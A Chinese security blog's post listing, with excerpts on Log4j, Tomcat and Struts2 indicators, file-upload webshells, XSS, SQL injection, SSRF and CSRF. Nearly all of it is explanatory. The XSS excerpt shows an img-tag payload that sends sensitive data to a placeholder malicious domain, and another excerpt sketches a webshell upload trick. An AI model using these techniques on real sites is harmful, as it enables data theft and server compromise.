- 博客(10)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 常见服务器、框架及组件漏洞详解(护网)
检查 IIS 日志,查看是否有异常的 PUT 请求、对敏感文件的访问请求以及包含特殊字符的文件名请求。:请求中包含恶意的 JNDI 地址,触发特定的 Log4j 漏洞 Payload,系统日志中出现异常的 Log4j 调用栈,网络流量异常。:攻击者利用 Tomcat 的某些漏洞,如特定版本中存在的远程代码执行漏洞,通过发送特制的请求在服务器上执行任意代码。:攻击者利用 Struts2 的某些漏洞,如特定版本中存在的命令执行漏洞,通过发送特制的请求在服务器上执行任意命令。攻击链特征,包含了命令执行语句。
2025-03-16 18:33:19
1049
原创 常见中间件及漏洞
常见漏洞包括目录遍历、远程代码执行等。Nginx:常见漏洞包括访问控制配置错误、缓存命中漏洞等。Tomcat:常见漏洞包括目录遍历、远程代码执行等。
2025-03-16 18:27:13
423
原创 渗透测试-Web文件上传漏洞
通过综合运用多种安全策略,如严格限制上传文件的类型、大小,对文件内容进行杀毒扫描,设置合理的文件存储路径和权限,监控上传日志等,可以有效降低文件上传漏洞的风险,保障Web应用的安全性。大部分网站和应用系统都有上传功能,若实现代码没有严格限制用户上传的文件后缀及类型,攻击者可上传任意PHP等脚本文件到可通过Web访问的目录,并让这些文件被PHP解释器执行,从而在远程服务器上执行任意PHP脚本。- 运行上传文件包含脚本木马和一句话内容马:先上传txt后缀的木马文件,再上传包含该txt文件路径的php文件。
2025-03-16 14:01:26
651
原创 渗透测试&护网&网络安全---xss
例如,使用<img src="http://[恶意域名]/<敏感数据>">,当浏览器尝试加载该图片时,会向恶意域名对应的DNS服务器发送请求,携带敏感数据作为子域名或路径参数,攻击者通过监控DNS服务器日志获取数据。:审视网页中所有接收用户输入的地方,如表单字段、URL参数、搜索框等,尝试输入特殊字符(如<script>、<img>等),观察页面是否过滤或转义。:攻击者将恶意脚本存储在目标网站,当管理员等高权限用户访问时,脚本执行,可能窃取管理员会话、修改网站配置、添加恶意用户等,实现提权操作。
2025-03-10 09:00:00
1915
原创 渗透测试&护网&网络安全---sql注入
SQL注入是一种网络安全漏洞,攻击者在用户输入的数据中插入恶意SQL代码,绕过应用程序的输入验证和过滤机制,执行未经授权的数据库操作。:严格验证和过滤用户输入数据,过滤敏感字符(如information_schema、into out_file、into dump_file、'、"、()等),确保只允许合法数据进入数据库。:使用特定函数(如floor()、group by()、exp()、updatexml()、extractvalue()等)触发数据库报错,通过报错信息获取数据库信息。
2025-03-09 21:44:11
744
原创 SSRF服务器请求伪造
定义SSRF:服务器请求伪造,攻击者又到服务器发送http请求给目标服务器,一般ssrf攻击目标为从外网无法访问的内网环境。原因一般都是因为服务器提供了从其他服务器应用获取数据的功能,而且没有过滤或者限制,例如从指定url获取网页文本内容,加载指定地址的图片,下载等出现ssrf的地方一般是:1、在线翻译2、转码服务3、分享4、图片加载与下载(通过url地址下载或者下载图片)5、图片、文章收藏功能6、网站采集、网页抓取的地方7、头像的地方。(远程加载头像)8、输
2023-12-08 15:04:01
453
原创 小知识---注入
对用户输入进行严格的验证,使用参数化的SQL语句,以及确保数据库用户拥有最小必要的权限,都是有效的防范措施。攻击者通过在应用程序的用户输入中插入恶意的SQL代码,从而欺骗数据库执行意外的查询。SQL 注入是通过将恶意 SQL 代码插入到应用程序的输入字段中,从而执行未授权的数据库查询或操作。攻击者通过在SQL语句中使用UNION关键字将额外的查询结果合并到原始查询结果中,从而获取额外的数据。攻击者在应用程序中的存储过程、触发器或其他地方注入恶意代码,以便在稍后的操作中触发执行。
2023-12-01 09:01:28
391
1
原创 知识点回顾---CSRF(跨站请求伪造)
CSRF 攻击是通过伪造用户的请求,利用用户在其他网站上的已登录状态执行未经授权的操作。攻击者可以通过这种方式执行任何需要身份验证的操作。使用 SameSite 属性来限制第三方网站对 cookie 的访问。检查请求中的 Referer 头,确保请求是从正确的来源发起的。使用随机生成的 CSRF 令牌,并将其嵌入到表单或请求中。
2023-11-30 22:15:00
425
1
原创 知识点回顾---web攻击流程
"""请注意,渗透测试应该始终在受控的、合法的环境中进行,并且只能在获得明确授权的情况下执行。使用自动化工具,如扫描器,检测目标中可能存在的常见漏洞,如 SQL 注入、XSS、CSRF 等。渗透测试是一种授权的活动,其目的是评估系统、应用程序或网络的安全性。尝试获取目标系统中的敏感信息,如数据库中的用户凭据、个人数据等。撰写渗透测试报告,详细描述发现的漏洞、攻击路径和建议的修复措施。利用发现的漏洞进行攻击,如 SQL 注入、XSS、命令注入等。收集有关目标的公开信息,如域名、IP地址、子域名等。
2023-11-30 17:30:47
510
1
原创 认识的积累
1、用相当于一倍的时间去记笔记。2、用同一种呈现形态去记忆(记忆是画面+内容的记忆)。3、笔记可以只记自己可以看懂的笔记,但是要“好看”,笔记是自己的理解和认识创造,不是摘抄。4、...
2022-04-04 23:14:16
377
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人